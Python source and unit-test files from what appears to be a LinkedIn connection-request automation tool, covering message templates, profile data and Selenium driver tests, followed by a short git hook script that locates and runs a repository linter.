var_ = var_.strip() if var_ in MY_NAMES: self._data = {**self._data, **{var_: val.strip()}} else: raise TemplateFileException( f"Variables other than {MY_NAMES} are not currently supported, you gave {var_}!") def parse(self: Template) -> str: def common_connection_request_random_choice() -> str: with open(TEMPL_FILE_PATH, 'r') as file: data = json.load(file) message = random.choice(data['template_common_connection_request']) return message def check_if_templ_variable_missing(var: str) -> bool: nonlocal self return var in self._data and self._data[var] is None and self._message.find(var) > -1 message = self._message for var in OTHERS: if var in self._data and self._data[var]: message = self._message.replace(var, self._data[var]) elif check_if_templ_variable_missing(var): message = common_connection_request_random_choice() return self.parse() if self._enable_language_tool: message = self._language_tool.correct(message) for var in NAMES: if var in self._data and self._data[var]: message = self._message.replace(var, self._data[var]) elif check_if_templ_variable_missing(var): message = common_connection_request_random_choice() return self.parse() return message def read(self: Template) -> str: message = self.parse() if len(message) > 300: raise TemplateMessageLengthExceededException( 'Personalized message length cannot exceed by 300, you gave %(characters)s characters' % {'characters': len(message)}) return message ``` #### File: linkedin/person/__init__.py ```python from __future__ import annotations import re import sys import json import nameparser from typing import ( Union, TextIO, ) from selenium import webdriver class Path_To_Element_By(object): SUGGESTION_BOX_ELEMENT_XPATH = '/html/body/div[6]/div[3]/div/div/div/div/div[2]/div/div/main/div[3]/section/section/section/div/ul/li[1]' SEARCH_RESULTS_PEOPLE_XPATH_PRM = '//*[@id="main"]/div/div/div[2]/ul/li[1]' SEARCH_RESULTS_PEOPLE_XPATH_SEC = '//*[@id="main"]/div/div/div[3]/ul/li[1]' class Person_Info(object): """Class Person_Info provides an object with person's necessary details fetched from linkedin's page. """ def __init__( self: Person_Info, *, name: str = None, occupation: str = None, profile_url: str = None, photo_url: str = None, location: str = None, summary: str = None, connect_button: webdriver.Chrome = None) -> None: """Constructor method initializes the Person_Info object with basic details about the person. :Args: - self: {Person_Info} self. - name: {str} person's name. - occupation: {str} person's occupation. - profile_url: {str} person's linkedin profile url. - photo_url: {str} person's linkedin profile photo url. - connect_button: {webdriver.Chrome} person's connect button instance. """ self.name = name name_ = nameparser.HumanName(self.name) self.first_name = name_.first self.last_name = name_.last self.occupation = occupation self.profile_url = profile_url if "?" in photo_url: self.photo_url = photo_url.split("?")[0] else: self.photo_url = photo_url self.connect_button = connect_button self.location = location self.summary = summary self.id = self.person_id() def person_id(self: Person_Info) -> str: """Method person_id() returns the person id filtering the person's profile url. :Args: - self: {Person_Info} self. :Returns: - {str} person id. """ _re = re.compile(r"([a-z]+-?)+([a-zA-Z0-9]+)?", re.IGNORECASE) return _re.search(self.profile_url) def freeze( self: Person_Info, file: Union[str, TextIO] = sys.stdout, mode: str = "w", _format: str = None ) -> None: """Method freeze() dumps the current object state in the given file in the given format. :Args: - self: {Person_Info} self. - file: {Union[str, TextIO]} file to dump the current object state in. - mode: {str} in what mode to open the file in. - _format: {str} in what format to write the data in. :Raises: - {Exception} if the format and the file is not identified. """ message = '' if _format == "json": message = json.dump({ "name": self.name, "person_id": self._person_id, "occupation": self.occupation, "profile_url": self.profile_url, "photo_url": self.photo_url, "location": self.location, "summary": self.summary }) elif _format == "raw": message = ("name: %(name)s\n" + "person_id: %(person_id)s\n" + "occupation: %(occupation)s\n" + "profile_url: %(profile_url)s\n" + "photo_url: %(photo_url)s\m" + "location: %(location)s\n" + "summary: %(summary)s") % { "name": self.name, "person_id": self._person_id, "occupation": self.occupation, "profile_url": self.profile_url, "photo_url": self.photo_url, "location": self.location, "summary": self.summary} else: raise Exception("Format '%(frmt)s' is not supported!" % {"frmt": _format}) if isinstance(file, str): with open(file=file, mode=mode) as file: if file.endswith(".json"): json.dump(message, file, indent=2) else: file.write(message) return elif file == sys.stdout: file.write(message) else: raise Exception("File '%(file)s' is not supported!" % {"file": file}) ``` #### File: test_lib/test_utils/test_figlet.py ```python from __future__ import annotations import unittest from unittest.mock import Mock from unittest.mock import patch from lib.utils.figlet import CreateFigletString class TestCreateFigletFunction(unittest.TestCase): @patch("pyfiglet.figlet_format") def test_createfigletstring_function_with_one_parameter( self: TestCreateFigletFunction, mock_figlet_format: Mock ) -> None: kwargs = {} CreateFigletString("inb") mock_figlet_format.assert_called_with( text="inb", font="standard", **kwargs) @patch("pyfiglet.figlet_format") def test_createfigletstring_function_with_two_parameters( self: TestCreateFigletFunction, mock_figlet_format: Mock ) -> None: kwargs = {} CreateFigletString("inb", font="slant") mock_figlet_format.assert_called_with( text="inb", font="slant", **kwargs) ``` #### File: test_lib/test_utils/test_validator.py ```python from __future__ import annotations import os import stat import unittest from lib import DRIVER_PATH from lib.utils.validator import Validator class TestValidatorClass(unittest.TestCase): def test_validator_error_code(self: TestValidatorClass) -> None: self.assertEqual(Validator.ERROR_INVALID_NAME, 123) def test_validator_constructor_exception( self: TestValidatorClass) -> None: different_types = [10, 10.19, [1, 2, 3, 4], ["abc", "bcd", "cdb"], {"name": "ayush"}] for i in range(len(different_types)): with self.assertRaises(ValueError): Validator(different_types[i]) def test_validator_constructor(self: TestValidatorClass) -> None: validator = Validator("https://www.linkedin.com/") self.assertEqual(validator._field, "https://www.linkedin.com/") def test_validator_is_url_method(self: TestValidatorClass) -> None: self.assertTrue(Validator("http://www.linkedin.com/").is_url()) self.assertTrue(Validator("https://www.linkedin.com/").is_url()) self.assertTrue(Validator("ftp://www.linkedin.com/").is_url()) self.assertTrue(Validator("ftps://www.linkedin.com/").is_url()) self.assertTrue(Validator( "https://www.linkedin.com/in/ornela-cerenishti-118400146/").is_url()) self.assertFalse(Validator("notavalidurl").is_url()) self.assertFalse( Validator("/ornela-cerenishti-118400146/").is_url()) def test_validator_is_email_method( self: TestValidatorClass) -> None: self.assertTrue(Validator("<EMAIL>").is_email()) self.assertTrue( Validator("<EMAIL>").is_email()) self.assertTrue( Validator("<EMAIL>").is_email()) self.assertTrue( Validator("<EMAIL>").is_email()) self.assertTrue( Validator("<EMAIL>").is_email()) self.assertTrue( Validator("<EMAIL>").is_email()) self.assertTrue( Validator("<EMAIL>").is_email()) self.assertFalse(Validator("@gmail.com").is_email()) self.assertFalse(Validator(".com@gmail").is_email()) def test_validator_is_path_method(self: TestValidatorClass) -> None: self.assertTrue(Validator(os.path.abspath(__file__)).is_path()) @unittest.skipIf(not os.getuid() == 0, "Cannot alter permissions without root!") def test_validator_is_executable_method( self: TestValidatorClass) -> None: original_file_permissions = stat.S_IMODE( os.lstat(DRIVER_PATH).st_mode) def add_execute_permissions(path): """Add write permissions from this path, while keeping all other permissions intact. Params: path: The path whose permissions to alter. """ ADD_USER_EXECUTE = stat.S_IXUSR ADD_GROUP_EXECUTE = stat.S_IXGRP ADD_OTHER_EXECUTE = stat.S_IXOTH ADD_EXECUTE = ADD_USER_EXECUTE | ADD_GROUP_EXECUTE | ADD_OTHER_EXECUTE current_permissions = stat.S_IMODE(os.lstat(path).st_mode) os.chmod(path, current_permissions | ADD_EXECUTE) add_execute_permissions(DRIVER_PATH) self.assertTrue(Validator(DRIVER_PATH).is_executable()) def remove_execute_permissions(path): """Remove write permissions from this path, while keeping all other permissions intact. Params: path: The path whose permissions to alter. """ NO_USER_EXECUTE = ~stat.S_IXUSR NO_GROUP_EXECUTE = ~stat.S_IXGRP NO_OTHER_EXECUTE = ~stat.S_IXOTH NO_EXECUTE = NO_USER_EXECUTE & NO_GROUP_EXECUTE & NO_OTHER_EXECUTE current_permissions = stat.S_IMODE(os.lstat(path).st_mode) os.chmod(path, current_permissions & NO_EXECUTE) remove_execute_permissions(DRIVER_PATH) self.assertFalse(Validator(DRIVER_PATH).is_executable()) # place the original file permissions back os.chmod(DRIVER_PATH, original_file_permissions) ``` #### File: test_lib/test_utils/test_window.py ```python from __future__ import annotations import unittest from unittest.mock import Mock from unittest.mock import patch from lib import Terminal class TestTerminalClass(unittest.TestCase): def setUp(self: TestTerminalClass) -> None: self.t = Terminal() @patch("sys.stdout.write") def test_setcursorposition_method_with_valid_x_and_y( self: TestTerminalClass, mock_stdout_write: Mock) -> None: self.t.setcursorposition(10, 10) mock_stdout_write.assert_called_with("%c[%d;%df" % (0x1B, 10, 10)) def test_getcursorposition_method(self: TestTerminalClass) -> None: (x, y) = self.t.getcursorposition() self.assertIsInstance(x, int) self.assertIsInstance(y, int) ``` #### File: test_linkedin/connect/test_linkedinsearchconnect.py ```python from __future__ import annotations import os import json import unittest from unittest.mock import Mock from unittest.mock import patch from lib import ping from errors import ConnectionLimitExceededException from linkedin import Driver from linkedin.DOM import JS from linkedin.login import LinkedIn from linkedin.connect import LinkedInSearchConnect @unittest.skipUnless(ping("linkedin.com"), "linkedin.com server not responding") class TestLinkedInSearchConnectClass(unittest.TestCase): def setUp(self: TestLinkedInSearchConnectClass) -> None: creds_abspath_ = os.path.dirname( os.path.abspath(__file__)) + "/../../creds/creds.json" with open(creds_abspath_, "r") as f: data = json.load(f) chrome_driver_options = [] chrome_driver_options.append(Driver.HEADLESS) chrome_driver_options.append( Driver.DEFAULT_HEADLESS_WINDOW_SIZE) self.linkedin = LinkedIn( user_email=data["user_email"], user_password=data["<PASSWORD>"], driver_path=data["driver_path"], opt_chromedriver_options=chrome_driver_options) def test_constructor_method_with_invalid_driver_instance_type( self: TestLinkedInSearchConnectClass) -> None: invalid_objs = [ 1, "ayush", [1, 2, 3, 4], {1: "ayush", 2: "mohika"}] for obj in invalid_objs: with self.assertRaises(TypeError): linkedinsearchconnect = LinkedInSearchConnect(obj) def test_contructor_method_with_invalid_limit_number( self: TestLinkedInSearchConnectClass) -> None: with self.assertRaises(ConnectionLimitExceededException): linkedinsearchconnect = LinkedInSearchConnect( self.linkedin.driver, limit=100) @patch("linkedin.DOM.JS.scroll_bottom") @patch("linkedin.DOM.JS.get_page_y_offset") def test_private_method_scroll(self: TestLinkedInSearchConnectClass, mock_js_get_page_y_offset: Mock, mock_js_scroll_bottom: Mock) -> None: linkedinsearchconnect = LinkedInSearchConnect( self.linkedin.driver) linkedinsearchconnect._scroll() mock_js_get_page_y_offset.assert_called() mock_js_scroll_bottom.assert_called() ``` #### File: test_linkedin/message/test_template.py ```python from __future__ import annotations import unittest from errors import TemplateFileException from linkedin.message import Template Template_Business = """Hi {{name}}, I'm looking to expand my network with fellow business owners and professionals. I would love to learn about what you do and see if there's any way we can support each other. Cheers!""" Template_Sales = """Hi {{name}}, I'm looking to connect with like-minded professionals specifically who are on the revenue generating side of things. Let's connect!""" Template_Real_Estate = """Hey {{name}}, Came across your profile and saw your work in real estate. I'm reaching out to connect with other like-minded people. Would be happy to make your acquaintance. Have a good day!""" Template_Creative_Industry = """Hi {{name}}, LinkedIn showed me your profile multiple times now, so I checked what you do. I really like your work and as we are both in the creative industy - I thought I'll reach out. It's always great to be connected with like-minded individuals, isn't it? {{my_name}}""" Template_Hr = """Hey {{name}}, I hope your week is off to a great start, I noticed we both work in the HR/Employee Experience field together. I would love to connect with you.""" Template_Include_Industry = """Hi {{name}}, I hope you're doing great! I'm on a personal mission to grow my connections on LinkedIn, especially in the field of {{industry}}. So even though we're practically strangers, I'd love to connect with you. Have a great day!""" Template_Ben_Franklin = """Hi {{name}}, The Ben Franklin effect - when we do a person a favor, we tend to like them more as a result. Anything I can do for you? Best, {{my_name}}""" Template_Virtual_Coffee = """Hi {{name}}, I hope you're doing well. I'm {{my_name}}, {{my_position}} of {{my_company_name}}. We're looking for {{position}} and it would be great to connect over a 'virtual' coffee/chat and see what we can do together?""" Template_Common_Connection_Request = [ """Hey {{name}}, I notice we share a mutual connection or two & would love to add you to my network of professionals. If you're open to that let's connect!""", """Hi {{name}}, I see we have some mutual connections. I always like networking with new people, and thought this would be an easy way for us to introduce ourselves.""", """Hi {{name}}, Life is both long and short. We have quite a few mutual connections. I would like to invite you to join my network on LinkedIn platform. Hopefully, our paths will cross professionally down the line. Until then, wishing you and yours an incredible {{year}}. {{my_name}}""", """Hi {{name}}, I was looking at your profile and noticed we had a few shared connections. I thought it would be nice to reach out to connect with you and share out networks. Thank you and hope all is well!""", """Hey {{first_name}}, I saw you're based in {{location}} and work on {{keyword}}, I'd love to connect. Thanks, {{my_name}}""" ] class TestTemplateApi(unittest.TestCase): def test_static_method_get_template_by_name( self: TestTemplateApi) -> None: template = Template( None, var_template=None, grammar_check=False, use_template='template_ben_franklin') self.assertEqual(template.get_template_by_name( 'template_ben_franklin'), Template_Ben_Franklin) self.assertEqual(template.get_template_by_name( 'template_business'), Template_Business) self.assertEqual(template.get_template_by_name( 'template_sales'), Template_Sales) self.assertEqual(template.get_template_by_name( 'template_real_estate'), Template_Real_Estate) self.assertEqual(template.get_template_by_name( 'template_creative_industry'), Template_Creative_Industry) self.assertEqual( template.get_template_by_name('template_hr'), Template_Hr) self.assertEqual(template.get_template_by_name( 'template_include_industry'), Template_Include_Industry) self.assertEqual(template.get_template_by_name( 'template_virtual_coffee'), Template_Virtual_Coffee) for i in range(5): self.assertEqual( template.get_template_by_name( 'template_common_connection_request')[i], Template_Common_Connection_Request[i]) with self.assertRaises(TemplateFileException): template.get_template_by_name('any_unknown_template') def test_method_parse_with_template_business( self: TestTemplateApi) -> None: template = Template(None, var_template=None, use_template='template_business', grammar_check=False) template.set_data({ 'name': 'Ayush', }) template_business = Template_Business.replace( '{{name}}', 'Ayush') self.assertEqual(template.parse(), template_business) ``` #### File: tests/test_linkedin/test_driver.py ```python from __future__ import annotations import os import stat import unittest from unittest.mock import call from unittest.mock import Mock from unittest.mock import patch from linkedin import Driver from lib import DRIVER_PATH from errors import WebDriverPathNotGivenException from errors import WebDriverNotExecutableException class TestDriverClass(unittest.TestCase): @unittest.skipIf(not os.getuid() == 0, "Requires root privileges!") def test_constructor_method_with_invalid_executable_path( self: TestDriverClass) -> None: paths = [1, (1, 2, 3), [1, 2, 3], {1: 1, 2: 2}] for path in paths: with self.assertRaises(WebDriverPathNotGivenException): driver = Driver(path) original_file_permissions = stat.S_IMODE( os.lstat(DRIVER_PATH).st_mode) def remove_execute_permissions(path): """Remove write permissions from this path, while keeping all other permissions intact. Params: path: The path whose permissions to alter. """ NO_USER_EXECUTE = ~stat.S_IXUSR NO_GROUP_EXECUTE = ~stat.S_IXGRP NO_OTHER_EXECUTE = ~stat.S_IXOTH NO_EXECUTE = NO_USER_EXECUTE & NO_GROUP_EXECUTE & NO_OTHER_EXECUTE current_permissions = stat.S_IMODE(os.lstat(path).st_mode) os.chmod(path, current_permissions & NO_EXECUTE) remove_execute_permissions(DRIVER_PATH) with self.assertRaises(WebDriverNotExecutableException): driver = Driver(driver_path=DRIVER_PATH) # place the original file permissions back os.chmod(DRIVER_PATH, original_file_permissions) @patch("linkedin.Driver.enable_webdriver_chrome") def test_constructor_method_with_valid_chromedriver_path(self: TestDriverClass, mock_enable_webdriver_chrome: Mock) -> None: driver = Driver(driver_path=DRIVER_PATH) mock_enable_webdriver_chrome.assert_called() @patch("selenium.webdriver.ChromeOptions.add_argument") def test_constructor_method_add_argument_internal_calls( self: TestDriverClass, mock_add_argument: Mock) -> None: calls = [ call(Driver.HEADLESS), call(Driver.INCOGNITO), call(Driver.NO_SANDBOX), call(Driver.DISABLE_GPU), call(Driver.START_MAXIMIZED), call(Driver.DISABLE_INFOBARS), call(Driver.ENABLE_AUTOMATION), call(Driver.DISABLE_EXTENSIONS), call(Driver.DISABLE_NOTIFICATIONS), call(Driver.DISABLE_SETUID_SANDBOX), call(Driver.IGNORE_CERTIFICATE_ERRORS)] driver = Driver(driver_path=DRIVER_PATH, options=[ Driver.HEADLESS, Driver.INCOGNITO, Driver.NO_SANDBOX, Driver.DISABLE_GPU, Driver.START_MAXIMIZED, Driver.DISABLE_INFOBARS, Driver.ENABLE_AUTOMATION, Driver.DISABLE_EXTENSIONS, Driver.DISABLE_NOTIFICATIONS, Driver.DISABLE_SETUID_SANDBOX, Driver.IGNORE_CERTIFICATE_ERRORS]) mock_add_argument.assert_has_calls(calls) ```
{ "source": "joshi-bharat/linter", "score": 3 }
#### File: joshi-bharat/linter/git_hooks.py ```python from __future__ import print_function import os import subprocess import sys def run_command_in_folder(command, folder): """Run a bash command in a specific folder.""" run_command = subprocess.Popen(command, shell=True, cwd=folder, stdin=subprocess.PIPE, stdout=subprocess.PIPE) stdout, _ = run_command.communicate() command_output = stdout.rstrip() return command_output def get_git_repo_root(some_folder_in_root_repo='./'): """Get the root folder of the current git repository.""" return run_command_in_folder('git rev-parse --show-toplevel', some_folder_in_root_repo) def get_linter_folder(root_repo_folder): """Find the folder where this linter is stored.""" try: return os.environ['LINTER_PATH'] except KeyError: print("Cannot find linter because the environment variable " "LINTER_PATH doesn't exist.") sys.exit(1) def main(): # Get git root folder. repo_root = get_git_repo_root() # Get linter subfolder linter_folder = get_linter_folder(repo_root) # Append linter folder to the path so that we can import the linter module. linter_folder = os.path.join(repo_root, linter_folder) sys.path.append(linter_folder) import linter linter.linter_check(repo_root, linter_folder) if __name__ == "__main__": main() ```